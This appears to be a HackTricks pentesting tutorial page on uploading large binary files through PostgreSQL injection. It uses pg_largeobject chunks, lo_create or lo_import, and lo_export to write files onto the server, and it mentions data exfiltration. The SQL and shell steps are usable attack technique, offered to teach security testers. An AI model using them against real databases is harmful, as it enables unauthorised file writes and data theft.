hacktricks/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
2024-12-12 11:39:29 +01:00

5.4 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

PostgreSQL Large Objects

PostgreSQL offers a structure known as large objects, accessible via the pg_largeobject table, designed for storing large data types, such as images or PDF documents. This approach is advantageous over the COPY TO function as it enables the exportation of data back to the file system, ensuring an exact replica of the original file is maintained.

For storing a complete file within this table, an object must be created in the pg_largeobject table (identified by a LOID), followed by the insertion of data chunks, each 2KB in size, into this object. It is crucial that these chunks are exactly 2KB in size (with the possible exception of the last chunk) to ensure the exporting function performs correctly.

To divide your binary data into 2KB chunks, the following commands can be executed:

split -b 2048 your_file # Creates 2KB sized files

For encoding each file into Base64 or Hex, the commands below can be used:

base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line

Important: When automating this process, ensure to send chunks of 2KB of clear-text bytes. Hex encoded files will require 4KB of data per chunk due to doubling in size, while Base64 encoded files follow the formula ceil(n / 3) * 4.

The contents of the large objects can be viewed for debugging purposes using:

select loid, pageno, encode(data, 'escape') from pg_largeobject;

Using lo_creat & Base64

To store binary data, a LOID is first created:

SELECT lo_creat(-1);       -- Creates a new, empty large object
SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID

In situations requiring precise control, such as exploiting a Blind SQL Injection, lo_create is preferred for specifying a fixed LOID.

Data chunks can then be inserted as follows:

INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));

To export and potentially delete the large object after use:

SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454);  -- Deletes the specified large object

Using lo_import & Hex

The lo_import function can be utilized to create and specify a LOID for a large object:

select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);

Following object creation, data is inserted per page, ensuring each chunk does not exceed 2KB:

update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;

To complete the process, the data is exported and the large object is deleted:

select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454);  -- Deletes the specified large object

Limitations

It's noted that large objects may have ACLs (Access Control Lists), potentially restricting access even to objects created by your user. However, older objects with permissive ACLs may still be accessible for content exfiltration.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}